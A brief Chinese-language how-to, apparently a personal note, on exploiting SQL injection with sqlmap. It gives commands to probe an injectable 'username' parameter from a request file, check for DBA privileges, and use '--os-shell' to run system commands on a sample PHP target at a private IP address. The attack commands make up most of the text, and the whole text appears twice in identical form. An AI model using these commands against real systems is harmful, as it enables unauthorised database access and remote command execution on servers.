首先找到注入点 证明存在注入漏洞
然后使用命令
sqlmap.py -r D:\1.txt -p username --random-agent --is-dba
看看是不是dba
这里不是dba所以不能使用--os-shell命令
如果是的话
例如
python sqlmap.py -u http://192.168.0.166/php/newsshow.php?cid=4 --os-shell
便可直接执行命令
首先找到注入点 证明存在注入漏洞
然后使用命令
sqlmap.py -r D:\1.txt -p username --random-agent --is-dba
看看是不是dba
这里不是dba所以不能使用--os-shell命令
如果是的话
例如
python sqlmap.py -u http://192.168.0.166/php/newsshow.php?cid=4 --os-shell
便可直接执行命令